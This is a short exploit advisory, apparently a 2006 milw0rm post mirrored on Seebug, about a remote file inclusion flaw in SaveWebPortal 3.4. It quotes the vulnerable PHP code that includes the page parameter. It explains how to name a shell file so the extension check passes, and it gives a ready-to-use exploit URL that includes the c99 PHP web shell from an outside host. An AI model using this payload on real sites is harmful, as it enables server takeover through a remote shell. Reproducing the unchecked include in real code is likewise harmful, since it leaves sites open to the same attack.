-------------------------------------------- SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads -------------------------------------------- Found by x0rax Master9976@hotmail.de -------------------------------------------- Vulnerable Code: <?php .... if (strstr ($page, ".php") || strstr ($page, ".htm") || strstr ($page, ".html")) { include ("$page"); .... ?> -------------------------------------------- to inject succesfully you have to create a file called shell.html.txt or shell.php.txt otherwise it wont work! -------------------------------------------- Affected File: index.php =] -------------------------------------------- Vulnerability: http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt -------------------------------------------- # milw0rm.com [2006-08-10]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论